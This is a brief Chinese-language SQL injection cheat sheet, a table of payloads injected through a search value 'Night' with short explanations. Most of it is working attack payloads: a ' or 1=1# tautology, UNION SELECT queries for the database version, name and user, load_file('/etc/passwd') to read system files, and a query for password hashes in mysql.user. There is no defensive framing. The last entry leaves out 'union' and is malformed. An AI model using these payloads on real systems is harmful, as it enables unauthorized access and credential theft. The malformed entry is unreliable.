| 注入攻击 | 说明 |
| Night | 判断注入点。第一次是正常请求,如果存在注入漏洞,那么第二次请求得到结果应该与第一次一样,并且第三次请求得到的结果应该与前两次不同 |
| Night’ or 1=1# | 返回所有数据,常用于有搜索功能的页面 |
| Night’ union select version()# | 返回版本信息 |
| Night’ union select database()# | 返回当前的库名 |
| Night’ union select user()# | 返回数据库的用户名信息 |
| Night’ union select session_user()# | |
| Night’ union select system_user()# | |
| Night’ union select load_file(‘/etc/passwd’)# | 读取系统文件 |
| Night’ select user ,password from mysql.user# | 返回数据库用户的密码信息,密码一般以MD5的方式存放 |
最新内容请见作者的GitHub页:http://qaseven.github.io/